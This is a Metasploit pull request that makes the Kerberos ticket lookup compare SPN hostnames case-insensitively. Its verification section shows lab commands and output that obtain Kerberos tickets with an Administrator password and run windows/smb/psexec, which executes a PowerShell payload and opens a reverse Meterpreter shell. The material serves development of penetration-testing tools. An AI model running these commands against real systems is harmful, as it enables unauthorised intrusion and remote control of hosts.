### PR TITLE
Kerberos ticket lookup fix

### DIFF
--- a/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
+++ b/lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb
@@ -1088,8 +1088,8 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
       end
 
       unless !sname_hostname ||
-        sname_hostname.to_s.downcase == credential.server.components[1] ||
-        sname_hostname.to_s.downcase.ends_with?('.' + credential.server.components[1])
+          sname_hostname.to_s.downcase == credential.server.components[1].downcase ||
+          sname_hostname.to_s.downcase.ends_with?('.' + credential.server.components[1].downcase)
         wlog("Filtered credential #{file_path} ##{index} reason: SPN (#{sname_hostname}) hostname does not match (spn: #{credential.server.components.snapshot.join('/')})")
         next
       end


### PR DESCRIPTION
This PR fixes an issue in the lookup logic when providing a Kerberos ticket as a file. The comparison of the SPN hostname was done case sensitive, which prevents the ticket to be used if the user sets the `*::rhostname` option with a different case than the one stored in the ticket.

## Verification
First, generate a service ticket using uppercase SPN hostname for the CIFS service.
- [ ] Start `msfconsole`
- [ ] `use admin/kerberos/get_ticket`
- [ ]  `run action=GET_TGS rhost=<remote host> username=<username> password=<passord> domain=<FQ domain name> spn=cifs/<HOSTNAME>.<FQ domain name>`

Use `windows/smb/psexec` to verify the ticket is correctly picked up when the `smb::rhostname` option is set in lowercase.
- [ ] `use windows/smb/psexec`
- [ ]  `run lhost=<local host> rhost=<remote host> username=<username> smb::auth=kerberos smb::rhostname=<hostname>.<FQ domain name> domaincontrollerrhost=<DC IP> domain=<FQ domain name> SMB::Krb5Ccname=<path of the service ticket generated before>`

## Scenarios

Get the Kerberos service ticket with `spn=cifs/DC01.newlab.local` (uppercase)

```
msf6 auxiliary(admin/kerberos/get_ticket) > run action=GET_TGS rhost=192.168.232.110 username=Administrator password=123456 domain=newlab.local spn=cifs/DC01.newlab.local
[*] Running module against 192.168.232.110
[+] 192.168.232.110:88 - Received a valid TGT-Response
[*] 192.168.232.110:88 - TGT MIT Credential Cache ticket saved to /home/n00tmeg/.msf4/loot/20250124142308_default_192.168.232.110_mit.kerberos.cca_740767.bin
[*] 192.168.232.110:88 - Getting TGS for Administrator@newlab.local (SPN: cifs/DC01.newlab.local)
[+] 192.168.232.110:88 - Received a valid TGS-Response
[*] 192.168.232.110:88 - TGS MIT Credential Cache ticket saved to /home/n00tmeg/.msf4/loot/20250124142308_default_192.168.232.110_mit.kerberos.cca_652761.bin
[+] 192.168.232.110:88 - Received a valid delegation TGS-Response
[*] Auxiliary module execution completed
```

### Before this fix

Using `smb::rhostname=dc01.newlab.local` (lowercase)

```
msf6 exploit(windows/smb/psexec) > run lhost=192.168.232.3 rhost=192.168.232.110 username=Administrator smb::auth=kerberos smb::rhostname=dc01.newlab.local domaincontrollerrhost=192.168.232.110 domain=newlab.local SMB::Krb5Ccname=/home/n00tmeg/.msf4/loot/20250124142308_default_192.168.232.110_mit.kerberos.cca_652761.bin
[*] Started reverse TCP handler on 192.168.232.3:4444
[*] 192.168.232.110:445 - Connecting to the server...
[*] 192.168.232.110:445 - Authenticating to 192.168.232.110:445|newlab.local as user 'Administrator'...
[-] 192.168.232.110:445 - Exploit failed: Rex::Proto::Kerberos::Model::Error::KerberosError Failed to load a usable credential from ticket file: /home/n00tmeg/.msf4/loot/20250124142308_default_192.168.232.110_mit.kerberos.cca_652761.bin
[*] Exploit completed, but no session was created.
```

### After this fix

Using `smb::rhostname=dc01.newlab.local` (lowercase)

```
msf6 exploit(windows/smb/psexec) > run lhost=192.168.232.3 rhost=192.168.232.110 username=Administrator smb::auth=kerberos smb::rhostname=dc01.newlab.local domaincontrollerrhost=192.168.232.110 domain=newlab.local SMB::Krb5Ccname=/home/n00tmeg/.msf4/loot/20250124142308_default_192.168.232.110_mit.kerberos.cca_652761.bin
[*] Started reverse TCP handler on 192.168.232.3:4444
[*] 192.168.232.110:445 - Connecting to the server...
[*] 192.168.232.110:445 - Authenticating to 192.168.232.110:445|newlab.local as user 'Administrator'...
[*] 192.168.232.110:445 - Loaded a credential from ticket file: /home/n00tmeg/.msf4/loot/20250124142308_default_192.168.232.110_mit.kerberos.cca_652761.bin
[*] 192.168.232.110:445 - Selecting PowerShell target
[*] 192.168.232.110:445 - Executing the payload...
[+] 192.168.232.110:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (177734 bytes) to 192.168.232.110
[*] Meterpreter session 1 opened (192.168.232.3:4444 -> 192.168.232.110:59417) at 2025-01-24 14:24:01 +0100

meterpreter >
```



